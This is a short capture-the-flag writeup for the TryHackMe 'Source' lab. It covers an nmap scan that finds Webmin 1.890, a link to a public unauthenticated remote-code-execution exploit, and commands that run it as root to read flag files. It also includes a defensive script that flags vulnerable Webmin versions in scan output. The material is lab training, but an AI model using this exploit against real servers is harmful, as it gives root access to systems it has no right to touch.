CTF : Source

CTF Source writeup. Source THM. Announced difficulty level: Easy

Posted by Boula-Bytes on 11 July 2022

Information

  • IP: 10.10.240.116
  • MYIP: 10.9.85.5

First enumeration

Basics

  • NMAP
```console
$ sudo nmap -p22,10000 -A 10.10.240.116
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 23:12 CEST
Nmap scan report for 10.10.240.116
Host is up (0.071s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)
|   256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA)
|_  256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (ED25519)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   37.49 ms 10.9.0.1
2   37.02 ms 10.10.240.116

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.56 seconds
```

Vulnerabilities search

I assumed MiniServ 1.890 was for Webmin version 1.890.
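The same banner reading works from the defender's side. This added example (not part of the original writeup) parses nmap normal output, treats the MiniServ version as the Webmin version as assumed above, and flags hosts on a watchlist; the sample scan, the `WATCHLIST` name and the `find_webmin` helper are constructed for illustration.

```python
import re

# Constructed sample in nmap "normal" output format (documentation-range IPs, not real hosts).
SAMPLE_SCAN = """\
Nmap scan report for 192.0.2.10
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
Nmap scan report for backup.example.test (192.0.2.11)
PORT      STATE  SERVICE VERSION
10000/tcp open   http    MiniServ 1.990 (Webmin httpd)
8443/tcp  closed https-alt
Nmap scan report for 192.0.2.12
PORT      STATE SERVICE VERSION
10000/tcp open  http    nginx 1.18.0
"""

# Versions to flag. 1.890 is the release this writeup found remotely exploitable as root;
# extend the set from the vendor's advisories for your own inventory (assumption).
WATCHLIST = {"1.890"}

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9a-fA-F.:]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s+(.*)$")
MINISERV_RE = re.compile(r"\bMiniServ (\d+\.\d+)\b")


def find_webmin(scan_text):
    """Return [(host, port, version, flagged)] for every open MiniServ service."""
    findings, host = [], None
    for line in scan_text.splitlines():
        m = HOST_RE.match(line.strip())
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line.strip())
        if not (m and host):
            continue  # skip closed ports, headers, and port lines with no host context
        banner = MINISERV_RE.search(m.group(2))
        if banner:  # keep the version as a string: a float would turn "1.890" into 1.89
            version = banner.group(1)
            findings.append((host, int(m.group(1)), version, version in WATCHLIST))
    return findings


if __name__ == "__main__":
    for host, port, version, flagged in find_webmin(SAMPLE_SCAN):
        status = "UPGRADE NOW" if flagged else "check against advisories"
        print(f"{host}:{port} Webmin {version} -> {status}")
```

Matching on the banner rather than on port 10000 means a relocated Webmin is still found, and a different service on port 10000 is not misreported.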

So I searched on Google and found this exploit: https://raw.githubusercontent.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/master/webmin-1.890_exploit.py

Well, let's try it :)

Exploit

```console
$ python3 webmin-1.890_exploit.py 10.10.240.116 10000 id
--------------------------------
   ______________    _____   __
  / ___/_  __/   |  /  _/ | / /
  \__ \ / / / /| |  / //  |/ /
 ___/ // / / ___ |_/ // /|  /
/____//_/ /_/  |_/___/_/ |_/
--------------------------------
WebMin 1.890-expired-remote-root
<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen.
uid=0(root) gid=0(root) groups=0(root)
</p>
curl: (56) OpenSSL SSL_read: error:0A000126:SSL routines::unexpected eof while reading, errno 0
```

It seems to work, and it seems that Webmin is executed by root... "Ho! Ho! Ho! It's Christmas!"

```console
$ python3 webmin-1.890_exploit.py 10.10.240.116 10000 "ls /home"
$ python3 webmin-1.890_exploit.py 10.10.240.116 10000 "cat /home/xxx/user.txt"
$ python3 webmin-1.890_exploit.py 10.10.240.116 10000 "cat /root/root.txt"
```

\o/